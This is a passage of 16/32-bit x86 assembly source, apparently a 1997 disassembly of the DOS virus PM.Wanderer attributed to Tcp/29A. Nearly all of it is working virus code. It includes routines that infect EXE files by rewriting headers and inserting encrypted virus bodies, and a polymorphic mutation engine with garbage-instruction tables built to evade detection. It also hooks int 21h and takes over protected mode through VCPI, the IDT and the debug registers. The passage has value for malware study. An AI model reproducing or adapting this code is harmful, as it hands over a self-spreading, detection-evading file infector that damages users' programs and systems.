cmp ax,4096 ; Too much items?
ja close_file ; Yes? then jmp
mov ax,ds:ofs_reloc ; Offset of 1st reloc. item
mov ds:ofs_relocitems,ax
mov eax,dword ptr ds:filesize_l
movzx ecx,ds:header_size
shl ecx,4 ; Calculate header size
sub eax,ecx ; Total size - header size
cmp eax,1000h ; Loadable module too small?
jb close_file ; Yes? then jmp
mov si,offset(val_ip)
mov di,offset(file_exeIP)
movsw ; Save Exe IP
movsw ; Save Exe CS
xor ax,ax
mov di,offset(val_ip)
stosw ; Set to 0
stosw ; Set to 0(vir code starts after header)
call go_start_file
mov cx,100h
mov ah,40h
mov dx,offset(buffer2)
call int_21h ; Save modified header
xor cx,cx
mov dx,ds:header_size
shl dx,4 ; Calculate size header
push dx
mov ax,4200h
call int_21h ; Lseek after header
mov dx,offset(buffer2)
mov ah,3Fh
call int_21h ; Read original code
call setup_engine ; Encrypt virus code
pop dx
push cx
xor cx,cx
mov ax,4200h
call int_21h ; Lseek after header
mov ah,40h
pop cx
push cx
call int_21h ; Save encrypted virus code after header
call go_end_file
pop cx
mov dx,offset(buffer2)
mov ah,40h
call int_21h ; Save original code (end of file)
jmp restore_fdate

mov ax,4200h
xor dx,dx
xor cx,cx
call int_21h ; Lseek start

xor dx,dx
xor cx,cx
mov ax,4202h
call int_21h ; Lseek end

db 9Ah ; call far int 21h
ofs_i21 dw 0
seg_i21 dw 0
jnc no_i21_error
mov ax,4B00h
int 21h ; If error then re-enter virus int 21h
; to remove the virus copy done for
; infection

; Prepare to call mutation engine
push bx
mov ax,0FFFFh
call get_n_random ; Get random mask [0..0FFFEh]
mov ds:xor_mask,ax
call encrypt_infection_routine ; Encrypt
mov si,100h ; Always starts at DS:100h (EXE & COM)
mov bp,si
mov di,offset(buffer1)
mov ax,160h
mov bx,si
push ds:random1
push ds:random2
call mutation_engine ; Encrypt to calculate the
mov ds:size_in_file,cx ; increase size in file
pop ds:random2
pop ds:random1
call mutation_engine ; Encrypt virus code
call encrypt_infection_routine ; Decrypt inf. routine
pop bx

encrypt_infection_routine: ; Encrypt/decrypt the infection routine
mov si,offset(infect_file)
mov cx,offset(return_dpl0)-offset(infect_file)
mov ax,ds:xor_mask
xor [si],ax
inc si
inc si
loop l_enc

filesize_l dw 0
filesize_h dw 0
size_in_file dw 0
xor_mask dw 0
file_exeIP dw 0
file_reloCS dw 0
reloc_items dw 0
ofs_relocitems dw 0

; Wanderer Mutation Engine
; Parameters :
; DS:SI -> code to encrypt
; ES:DI -> buffer
; CX -> size
; BP -> delta offset (runtime offset)
; AX -> max size of decryptor
; BX -> min size of decryptor
; Return :
; CX -> size of decryptor + data encrypted

mov enc_buffer,di ; Addr. buffer
mov delta_ofs,bp ; Addr. source code
mov mask_dec_ofs,0
mov end_encryptor,0C3h ; RET
mov code_size,cx ; Number of bytes to encrypt
push cs
pop es
sub ax,bx ; Decryptor size in [BX..AX]
call get_n_random ; [0..AX-BX]
add ax,bx ; [BX..AX]
mov decryptor_size,ax
add di,ax ; Space for decryptor in buffer
rep movsb ; Copy code to encrypt
mov ax,2
call get_n_random ; [0,1]
mov ptr_select_reg,ax
mov ax,5
call get_n_random ; [0..4]
add al,0Ah ; [0Ah..0Eh]
xchg ax,cx
mov ax,decryptor_size
div cl
sub cl,4
mov operations,cl ; Number of encryption ops
xor ah,ah
mov max_garbage,ax ; Max garbage per operation
mov al,3
call get_n_random ; [0..2]
inc al ; AL in [1..3]
or ds:op_dec_counter,al ; Opcode for decreasing counter
mov ds:reg_counter,al
call get_garbage_number
mov di,enc_buffer
call generate_garbage
mov bx,offset(register_table)
add bx,ptr_select_reg ; Select registers in table
mov al,[bx] ; Register 0 (SI) or 1 (DI)
mov indexreg_op1,al ; Index for operations
mov dl,[bx+2] ; Register 2 (SI) or 3 (DI)
mov ds:indexreg_op2,dl ; Index register
mov bp,decryptor_size
add bp,delta_ofs
call get_garbage_number
call generate_mov ; Load a reg with delta-ofs
mov dl,ds:reg_counter
mov bp,code_size
call get_garbage_number
shr cx,1 ; Decrypt words
call generate_mov ; Load a reg with # of loops
mov ds:in_loop,1
mov ofs_loop_begin,di ; Start of loop code
call get_garbage_number
shr cx,1
call generate_garbage
mov cl,operations ; Number of operations
xor ch,ch
push cx
call generate_operation
call get_garbage_number
call generate_garbage
pop cx
loop l_gen_op
mov al,40h ; Gen. inc index reg (SI | DI)
or al,ds:indexreg_op2
call get_garbage_number
call generate_garbage
mov cx,di ; End loop
sub cx,ofs_loop_begin ; Calculate loop size
inc cx
inc cx
push si
mov si,offset(code_loop) ; Generate end-loop code
pop si
add cx,4
neg cx
mov [di-2],cx ; Jmp to begin of loop
jmp fill_with_garbage

op_dec_counter db 48h ; dec reg_counter: DEC CX | DX | BX
jz end_code_loop
db 0e9h,0,0 ; jmp to start of decryption loop

;;;; Unused code ! ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov al,0E2h ; LOOP opcode
stosb ; Store it
xchg al,cl
neg al ; loop jmp

mov cx,decryptor_size
add cx,enc_buffer
sub cx,di ; Fill buffer with garbage
mov ds:in_loop,0 ; Loop finished
call generate_garbage
push di
mov cx,code_size
mov bx,decryptor_size
add bx,enc_buffer
mov al,ds:indexreg_op2
or ds:mov_pointerreg_bx,al
or ds:inc_pointerreg,al
mov ax,ds:encryptor_ptr
db 89h ; mov index register,bx
mov_pointerreg_bx db 0D8h
call ds:encryptor_ptr
inc_pointerreg db 40h ; inc index register
loop l_encrypt_code
pop cx
mov dx,enc_buffer
sub cx,dx
add cx,code_size
mov ds:encryptor_ptr,offset(end_encryptor) ; Reset buffers
mov ds:ofs_endencryptor,offset(end_encryptor)
mov al,0F8h
and ds:mov_pointerreg_bx,al ; Clear registers
and ds:inc_pointerreg,al
and ds:op_dec_counter,al

db 4 ; SI
db 5 ; DI
db 6 ; SI
db 7 ; DI

mov ax,7
call get_n_random ; [0..6]
shl ax,2 ; AX in [0,4,8,...,24]
mov si,offset(operation_table)
add si,ax ; Select operation
mov bx,ds:encryptor_ptr
cmp al,20 ; Needs an immediate address?
ja get_immaddr ; Yes? then jmp
mov cx,[si] ; Get decryptor opcode
or ch,indexreg_op1 ; Insert op register
mov [di],cx ; Add to decryptor
mov cx,[si+2] ; Get encryptor opcode
or ch,indexreg_op1 ; Insert op register
scasw ; SI+2, DI+2
cmp al,12 ; Inst. needs a mask?
jb get_inst_mask ; Yes? then jmp
mov [bx-2],cx ; Add to encryptor
sub ds:encryptor_ptr,2 ; Next encryptor entry

mov al,0FFh
call get_n_random ; Get mask [0..0FEh]
mov mask_dec_ofs,di ; Save current offsets
mov mask_enc_ofs,bx
stosb ; Add mask to decryptor
mov [bx-3],cx ; Add instruction to encryptor
mov [bx-1],al ; Add mask to encryptor
sub ds:encryptor_ptr,3

cmp mask_dec_ofs,0 ; Any mask instruction?
jz no_mask_inst ; No? then jmp
mov bx,ds:ofs_endencryptor ; Add inst at end of encryptor
mov ax,[si]
stosw ; Add instruction to decryptor
mov ax,[si+2]
mov [bx],ax ; Add instruction to encryptor
mov ax,mask_dec_ofs ; Calculate mask address in decryptor
add ax,delta_ofs
sub ax,enc_buffer
stosw ; Add address to instruction
mov ax,mask_enc_ofs ; Calculate mask address in encryptor
dec ax
mov [bx+2],ax ; Add to encryptor
mov al,0FFh
call get_n_random ; [0..0FEh]
stosb ; Value for adding to the mask
mov [bx+4],al
add ds:ofs_endencryptor,5 ; New end of encryptor
mov byte ptr [bx+5],0C3h ; Add a RET at end
mov mask_dec_ofs,0

db 80h,30h ; xor byte ptr [index],??
db 80h,30h ; xor byte ptr [index],??

db 80h,0 ; add byte ptr [index],??
db 80h,28h ; sub byte ptr [index],??

db 0C0h,0 ; rol byte ptr [index],??
db 0C0h,8 ; ror byte ptr [index],??

db 0D0h,0 ; rol byte ptr [index],1
db 0D0h,8 ; ror byte ptr [index],1

db 0F6h,18h ; neg byte ptr [index]
db 0F6h,18h ; neg byte ptr [index]

db 0FEh,0 ; inc byte ptr [index]
db 0FEh,8 ; dec byte ptr [index]

db 80h,6 ; add byte ptr [imm],??
db 80h,6 ; add byte ptr [imm],??

mov ax,4
call get_n_random ; [0..3]
mov si,offset(mov_table)
xchg al,ah
aad 3 ; Select mov type
add si,ax
shl ax,1 ; Check if needs to use routine 1 or 0
xchg ax,bx
call [bx+offset(mov_select)]

dw offset(mov_r1)
dw offset(mov_r2)

mov_r1: ; Generates: mov reg(dl),value(bp)
movsw ; Store instruction opcodes
or [di-1],dl ; Set destination register
xchg ax,bp
stosw ; Store delta offset
call generate_garbage


; Generates: (xor | sub) reg(dl),reg(dl)
; (add | xor | or) reg(dl),value(bp)
push si
push dx
mov ax,2
call get_n_random ; 0 or 1
shl ax,1 ; Select instruction (clear register)
add ax,offset(reg0_table)
xchg ax,si
movsw ; Store instruction zero register
or [di-1],dl ; Destination register
shl dl,3
or [di-1],dl ; Source reg. (same as destination)
shr cx,1
push cx
push bp
call generate_garbage
pop bp
pop cx
pop dx
pop si
movsw ; Store instruction
or [di-1],dl ; Destination register
xchg ax,bp
stosw ; Store delta offset
call generate_garbage

db 0 ; Use mov_r1
db 0C7h,0C0h ; MOV reg,imm
db 1 ; Use mov_r2
db 81h,0C8h ; OR reg,imm
db 1 ; Use mov_r2
db 81h,0C0h ; ADD reg,imm
db 1 ; Use mov_r2
db 81h,0F0h ; XOR reg,imm

db 29h,0C0h ; SUB reg,reg
db 31h,0C0h ; XOR reg,reg

mov ax,max_garbage
call get_n_random ; [0..max_garbage-1]
xchg ax,cx

and cx,cx ; Generate garbage?
jnz do_garbage ; Yes? then jmp

mov si,offset(garbage_table)
mov ax,1Fh
call get_n_random ; [0..1Eh]
mov dl,al
inc dl ; DL in [1..1Fh]
mov al,[si] ; Read entry
cmp al,4Eh ; End of table?
jne check_entry ; No? then jmp
mov si,offset(garbage_table)
jmp process_table_entry

mov dh,al
and al,0Fh ; Get number of opcodes
cbw ; AH:=0 (b'cos AL<80h)
and dl,dl ; Generate this instruction block?
jz generate_block ; Yes? then jmp
dec dl
shr dh,4 ; Calculate next table entry address :
add al,dh ; #opcodes + #patches + 2
add si,ax
inc si
inc si
jmp process_table_entry

push cx
sub cx,ax ; Sub instruction size from garbage
test ch,80h ; Instruction too big?
pop cx
jne l_select_entry ; Yes? then jmp (don't generate)
mov ds:garbagetogen,cx ; Remaining garbage
mov bl,[si+1] ; Read block flags
cmp ds:jmp_ofs,bl ; Allowed instruction? (don't allow
; inside another
ja l_select_entry ; No? then jmp
mov bh,bl
test bl,40h ; Can be in the decryptor loop?
jne loop_ok ; Yes? then jmp
cmp ds:in_loop,1 ; Is in the loop?
je l_select_entry ; Yes? then jmp
push ax
mov ax,3Fh
and bl,al ; Get block probabilities
call get_n_random
cmp bl,al ; Generate block?
pop ax
jb l_select_entry ; No? then jmp
inc si
push si
push cx
xor bx,bx
mov bl,dh
and bl,0F0h ; get # of patches
shr bl,4
inc bx
mov cx,ax ; # of opcodes
push si
push di
add si,bx
rep movsb ; Generate block
pop di
pop si
mov cx,bx ; # of patches
dec cx ; Any patch?
jcxz done_patches ; No? then jmp
inc si
mov al,[si] ; Read patch from table
mov dl,al
and al,0Fh ; Get byte to patch
mov bp,ax
mov al,dl
and al,0F0h ; Get function to use
shr al,3
mov bx,ax
add bx,offset(function_table)
call word ptr [bx] ; Call function
loop l_do_patches
pop cx
pop si
mov al,dh
and al,0Fh ; Number of opcodes
shr dh,4 ; Number of patches
sub cx,ax ; Sub generated # from total garbage
add di,ax ; Inc buffer pointer
add al,dh ; opcodes+patches
add si,ax ; SI points to next table entry
inc si ;
mov al,ds:jmp_ofs
and al,al ; Any jmp?
jz all_garbage? ; No? then jmp
test al,80h ; Generating a jump?
jnz all_garbage? ; Yes? then jmp
; else jmp is finished
add cx,di ; garbage to gen + current offset
mov di,previous_ofs ; Save current offset
sub cx,di ; Sub jmp displacement from garbage
mov ds:jmp_ofs,0
and cx,cx ; All garbage generated?
jz exit_garbage ; Yes? then jmp
jmp l_select_entry ; No? then jmp

mov previous_ofs,di

F_G_BYTE = 0 * 16
dw offset(generate_byte_word)
F_I_OP_REG = 1 * 16
dw offset(insert_op_reg)
F_I_REG = 2 * 16
dw offset(insert_reg)
F_I_MODRM = 3 * 16
dw offset(insert_modrm)
F_I_RM = 4 * 16
dw offset(insert_rm)
F_ADD_0_5 = 5 * 16
dw offset(add_0_5)
F_I_REGRMMOD = 6 * 16
dw offset(insert_regrmmod)
F_G_JXX = 7 * 16
dw offset(generate_jxx)
F_G_WORD = 8 * 16
dw offset(generate_byte_word)
dw offset(insert_reg_preserve_modrm)
F_I_RUNTIME_OFS = 10 * 16
dw offset(insert_runtime_ofs)
F_I_LAST_REG_SRC = 11 * 16
dw offset(insert_last_reg_src)
F_I_LAST_REG_DEST = 12 * 16
dw offset(insert_last_reg_dest)

mov al,0FFh
call get_n_random ; [0..0FEh]
mov es:[di+bp],al ; Store byte
test dl,80h ; Generating word?
jz ret_gen_b_w ; No? then jmp
mov al,0FFh
call get_n_random ; [0..0FEh]
mov es:[di+bp+1],al ; Store another byte

mov al,0F0h
call get_n_random ; [0..0EFh]
and al,80h ; AL:=(80h or 0)
mov ah,al
shr al,1 ; AL:=(40h or 0)
or al,ah ; AL:=(0C0h or 0)
or es:[di+bp],al ; 0 -> register index
; 0C0 -> register to register

mov al,0F0h
call get_n_random ; [0..0EFh]
and al,7 ; Select register
cmp al,ds:reg_sp ; SP ?
je insert_reg ; Yes? then jmp
cmp al,ds:indexreg_op2 ; Used as index ?
je insert_reg ; Yes? then jmp
push ax
and al,3
cmp al,ds:reg_counter ; Used as counter ?
pop ax
je insert_reg ; Yes? then jmp
or es:[di+bp],al ; Insert register
mov unused_reg,al ; Save for later use

mov al,6
call get_n_random ; [0..5]
add es:[di+bp],al

mov al,80h
call get_n_random ; [0..7Fh]
and al,00000111b ; AL in [0..7]
cmp al,00000110b ; immediate address?
je insert_rm ; Yes? Skip it
or es:[di+bp],al

call insert_mod
call insert_rm

call insert_reg
shl byte ptr es:[di+bp],3 ; Register
call insert_rm
call insert_mod

mov al,0Fh ; [0..0Eh]
call get_n_random
shl al,3 ; Operation
or es:[di+bp],al ; ADD, OR, ADC,...
call insert_reg

mov al,10h ; [0..0Fh]
call get_n_random
or es:[di+bp-1],al ; JO,JNO,JB,JNB,JE,JNE,JBE,JA,
mov ax,ds:garbagetogen ; Don't jmp out of garbage code
dec ax
dec ax
call get_n_random ; [0..AX-1]
and ax,3Fh ; jmp offset in [0..3Fh]
mov es:[di+bp],al ; Write offset
mov cx,ax
or al,80h ; Flag: generating cond. jmp
mov ds:jmp_ofs,al
add di,bp
inc di
call generate_garbage
and ds:jmp_ofs,7Fh ; Clear flag

mov bl,es:[di+bp] ; Read mod, r/m
mov byte ptr es:[di+bp],0
call insert_reg
shl byte ptr es:[di+bp],3 ; Insert register
or byte ptr es:[di+bp],bl ; Previous mod, r/m

mov al,unused_reg
or es:[di+bp],al ; Insert register

mov ax,di ; Destination offset
sub ax,enc_buffer ; Offset in buffer
add ax,delta_ofs ; Offset in runtime
add es:[di+bp],ax

mov al,unused_reg
shl al,3
or es:[di+bp],al ; Insert register

; Garbage table format :
; Each entry:
; ABh
; |^Number of bytes in this blocks
; Number of fix functions
; CDh : 11111111b
; ||^^^^^^Generation probabilty of this block when selected
; |Can be in a loop? (1=yes)
; Can be generated? (1=always, 0=depend of previous generations)
; EFh |
; |^Byte to fix | Number of fixes
; Function to use |
; [...] |
; GHh (byte 0) | List of opcodes in the block
; [...] |

; TEST ??,imm8 :
db 23h ; 2 fixes, 3 bytes
db 0FFh ; Generate always, in loop, 100%
db F_I_MODRM + 1 ; Function F_I_MODRM in byte 1
db F_G_BYTE + 2 ; Function F_G_BYTE in byte 2
db 0F6h ; byte 0
db 0 ; byte 1
db 0 ; byte 2

; 1 byte opcodes (CLC, STC, CLI, STI, CLD, STD) :
db 11h
db 0FFh
db F_ADD_0_5 + 0
db 0F8h

; Jxx :
db 12h
db 7Fh ; Don't gen a Jxx when another is being gen
db F_G_JXX + 1
db 70h
db 0

; Arithmetic ops :
db 24h
db 0FFh
db F_I_OP_REG + 1
db 81h
db 0C0h
db 0
db 0

; DEC reg :
db 11h
db 0FFh
db F_I_REG + 0
db 48h

; NOP or XCHG AX,reg :
db 11h
db 0FFh
db F_I_REG + 0
db 90h

; ROL,ROR,RCL,... reg,1
db 12h
db 0FFh
db F_I_OP_REG + 1
db 0D1h
db 0C0h

; NOP or XCHG AX,reg : This entry is duplicated !?
db 11h
db 0FFh
db F_I_REG + 0
db 90h

; NEG reg :
db 12h
db 0FFh
db F_I_REG + 1
db 0F7h
db 0D8h

; CMP xx,reg :
db 12h
db 0FFh
db 38h
db 0

; MOV reg,xxxx :
db 23h
db 0FFh
db F_I_REG + 0
db F_G_WORD + 1
db 0B8h
db 0
db 0

; INC reg :
db 11h
db 0FFh
db F_I_REG + 0
db 40h

; IN AL,xx :
db 12h
db 0FFh
db F_G_BYTE + 1
db 0E4h
db 0

; MOV reg8,[xxxx] :
db 24h
db 0FFh
db F_G_WORD + 2
db 8Ah
db 6
db 0
db 0

; CMP byte ptr [reg+(reg)+imm16],imm8 :
db 35h
db 0FFh
db F_I_RM + 1
db F_G_WORD + 2
db F_G_BYTE + 4
db 80h
db 0B8h
db 0
db 0
db 0

; NOT reg :
db 12h
db 0FFh
db F_I_REG + 1
db 0F7h
db 0D0h

; OR reg,...
db 12h
db 0FFh
db 0Ah
db 0

db 4Eh ; End of garbage table mark

jmp_ofs db 0
db 0 ; Wasted byte!
garbagetogen dw 0
reg_sp db 4 ; SP register
reg_counter db 81h
indexreg_op2 db 86h
db 80h ; Wasted byte!
in_loop db 0

mov ah,2Ch
call int_21h ; Get current time
mov cs:random1,cx ; Hours + minutes
mov cs:random2,dx ; Seconds + hundredths of second

get_n_random: ; Returns pseudo-random value in [0..(AX-1)]
call get_random
mov bx,sp
mov cx,dx
mul word ptr ss:[bx+0Eh]
mov ax,cx
mov cx,dx
mul word ptr ss:[bx+0Eh]
add ax,cx
adc dx,0
mov ss:[bx+0Eh],dx

mov ax,cs:random1
mov bx,cs:random2
mov cx,ax
mul cs:mult_const
shl cx,3
add ch,cl
add dx,cx
add dx,bx
shl bx,2
add dx,bx
add dh,bl
shl bx,5
add dh,bl
add ax,1
adc dx,0
mov cs:random1,ax
mov cs:random2,dx

mult_const dw 8405h
random1 dw 0
random2 dw 0
encryptor_ptr dw offset(end_encryptor)
ofs_endencryptor dw offset(end_encryptor)

call set_ds
mov ax,ss
mov es,ax
mov esi,cs:page_1
mov ds:[esi+infecting],0 ; Can infect again
assume cs:data0
mov esp,cs:_esp
assume cs:wanderer
mov edi,esp
mov ecx,STACK_SIZE/4
db 0F3h,66h,67h,0A5h ; rep movsd (TASM FIX)
; Restore stack
push ds
pop es
xor ebp,ebp
mov esi,90h ; Restore pages allocated by infection procedure
mov edx,cs:old_pages[ebp*4]
call map_page
inc esi ; Next 4KB
inc bp ; Next page
cmp bp,3 ; old_page1,2 and 3 restored?
jne l_restore_pages ; No? then jmp
xor ax,ax
mov ds,ax
mov es,ax
iretd ; Return to original caller

; Format of a Page Table Entry
; 31 12 11 0
; º ³ ³ ³ ³ ³ ³U³R³ º
; º PAGE FRAME ADDRESS 31..12 ³ AVAIL ³0 0³D³A³0 0³/³/³Pº
; º ³ ³ ³ ³ ³ ³S³W³ º

mov edi,cs:pagetable
mov ebx,[edi][esi*4] ; Read page in page table
mov dl,67h
mov [edi][esi*4],edx ; Store new page in page table
mov eax,cr3
mov cr3,eax

movzx ebx,ds:virus_cs
shl ebx,4
add ebx,offset(GDTR) ; Calculate GDTR phys address
mov ds:addr_GDTR,ebx
add ebx,IDTR-GDTR ; Calculate IDTR phys address
add ds:addr_IDTR,ebx
mov cx,ds:addr_dir_page
mov es,cx
shr cx,8
mov ax,0DE06h ; VCPI - Get dir page phys addr in 1st MB
call VCPI
mov ds:_CR3,edx ; EDX = physical address of dir page
mov ax,0DE06h ; VCPI - Get phys addr of page in 1st MB
mov cx,es
shr cx,8
inc cx ; Addr of page table
call VCPI
or dl,7 ; User level, read-write, present
mov es:[0],edx ; Store page table in page directory

int 67h ; - LIM EMS
and ah,ah ; Error or VCPI not present ?
jz no_ems_error ; No? then jmp
pop ax
jmp exec_host

; 31 23 15 7 0
; º ³ ³ ³ ³A³ LIMIT ³ ³ ³ TYPE ³ º
; º BASE 31..24 ³G³B³0³V³ 19..16 ³P³ DPL ³ ³ BASE 23..16 º 4
; º ³ ³ ³L³ ³ ³ ³1³0³E³W³A³ º
; º ³ º
; º SEGMENT BASE 15..0 ³ SEGMENT LIMIT 15..0 º 0
; º ³ º
; 31 23 15 7 0
; º ³ ³ ³ ³A³ LIMIT ³ ³ ³ TYPE ³ º
; º BASE 31..24 ³G³D³0³V³ 19..16 ³P³ DPL ³ ³ BASE 23..16 º 4
; º ³ ³ ³ ³L³ ³ ³ ³1³0³C³R³A³ º
; º ³ º
; º SEGMENT BASE 15..0 ³ SEGMENT LIMIT 15..0 º 0
; º ³ º
; 31 23 15 7 0
; º ³ ³ ³ ³A³ ³ ³ ³ ³ ³ º
; º BASE 31..24 ³G³X³O³V³ LIMIT ³P³ DPL ³0³ TYPE ³ BASE 23..16 º 4
; º ³ ³ ³ ³L³ 19..16 ³ ³ ³ ³ ³ º
; º ³ º
; º SEGMENT BASE 15..0 ³ SEGMENT LIMIT 15..0 º 0
; º ³ º
; System and Gate descriptor types :
; Code Type of Segment or Gate
; 0 -reserved
; 1 Available 286 TSS
; 2 LDT
; 3 Busy 286 TSS
; 4 Call Gate
; 5 Task Gate
; 6 286 Interrupt Gate
; 7 286 Trap Gate
; 8 -reserved
; 9 Available 386 TSS
; A -reserved
; B Busy 386 TSS
; C 386 Call Gate
; D -reserved
; E 386 Interrupt Gate
; F 386 Trap Gate

; AX = descriptor
; CX = base address
; BX = limit
; DX = rights
movzx eax,ax
mov [esi][eax],bx ; Limit 15..0
shr ebx,10h
mov [esi+2][eax],cx ; Base 15..0
shr ecx,10h
mov [esi+4][eax],cl ; Base 23..16
mov [esi+5][eax],dl ; Type, DPL, P,...
and bl,0Fh
or dh,bl
mov [esi+6][eax],dh ; Limit 19..16, AVL, G,...
mov [esi+7][eax],ch ; Base 31..24

mov eax,cs:i21h_ep
mov dr0,eax ; Address for breakpoint 0 (int 21h)
mov eax,0FE05Bh ; BIOS address: near jump to reboot
mov dr1,eax ; Address for breakpoint 1
xor eax,eax
mov dr6,eax ; Clear dr6 (the processor never clears it)
mov eax,00000000000000000000001000001010b
; ^ ^
; 2 breakpoints (globals)
mov dr7,eax

mov ax,cs
add ax,8
mov ds,ax

; 31 23 15 7 0
; º OFFSET 31..16 ³ P ³DPL³0 1 1 1 0³0 0 0³(NOT USED) º4
; º SELECTOR ³ OFFSET 15..0 º0
; 80386 TRAP GATE
; 31 23 15 7 0
; º OFFSET 31..16 ³ P ³DPL³0 1 1 1 1³0 0 0³(NOT USED) º4
; º SELECTOR ³ OFFSET 15..0 º0

build_idt_descriptor: ; On entry:
; ECX = interrupt number
; AX = address of service routine
; DI = address to store orig int & sel
mov esi,es:IDT_base ; Access to IDT
mov bx,[esi+6][ecx*8] ; Offset 31..16
shl ebx,10h
mov bx,[esi][ecx*8] ; Offset 15..0
mov es:[di],ebx ; Save original int
mov bx,[esi+2][ecx*8] ; Get selector
mov es:[di+4],bx ; Save original selector
mov bx,es:virus_selector
mov [esi+2][ecx*8],bx ; Set new selector
mov [esi][ecx*8],ax ; Set new interrupt (15..0)
mov word ptr [esi+6][ecx*8],0 ; (31..16)

_CR3 dd 0
addr_GDTR dd 0
addr_IDTR dd 0
LDTR dw 0
TR dw TSS_SEL ; TSS selector
pm_EIP dd offset(pm_entry_point) ; Protected mode EIP
pm_CS dw CODE_SEL ; Protected mode CS selector

limit_gdt dw 47h
base_gdt dd 0

limit_idt dw 0FFFFh
base_idt dd 0

host_type db 0
codesegment dw 0
pm_ep dd 0


size_mcb dw ?
orig_i1 dd ?
sel_i1 dw ?
orig_i9 dd ?
sel_i9 dw ?
i21h_ep dd ?
virus_cs dw ?
virus_selector dw ?

page_1 dd ?
page_2 dd ?
page_3 dd ?
page_4 dd ?

old_pages dd ?
old_page2 dd ?
old_page3 dd ?

addr_dir_page dw ?
infecting db ?
pagetable dd ?

GDT_limit dw ?
GDT_base dd ?

IDT_limit dw ?
IDT_base dd ?

org 1000h
db BUFFER_SIZE dup(?)

signature dw ?
image_size dw ?
pages dw ?
relo_items dw ?
header_size dw ?
mim_mem dw ?
max_mem dw ?
stack_seg dw ?
stack_ofs dw ?
checksum dw ?
val_ip dw ?
val_cs dw ?
ofs_reloc dw ?
overlays dw ?

wanderer ends

data0 segment use16
org 0
db STACK_SIZE dup(?) ; Stack
_esp dd ?
db 3Ch dup(?) ; Buffer for encryptor
end_encryptor db ?
db 0Fh dup(?) ; Buffer for encryptor
psp_seg dw ?
filetime dw ?
filedate dw ?
previous_ofs dw ?
mask_dec_ofs dw ?
mask_enc_ofs dw ?
ofs_loop_begin dw ?
decryptor_size dw ?
max_garbage dw ?
dd ?
ptr_select_reg dw ?
code_size dw ?
operations db ?
indexreg_op1 db ?
dw ?
delta_ofs dw ?
enc_buffer dw ?
unused_reg db ?
saved_sp dw ?
saved_ss dw ?

org 0F0h
copy_code = $

data0 ends
end start

; End of PM.Wanderer disassembly
; (c) 1997, Tcp/29A (

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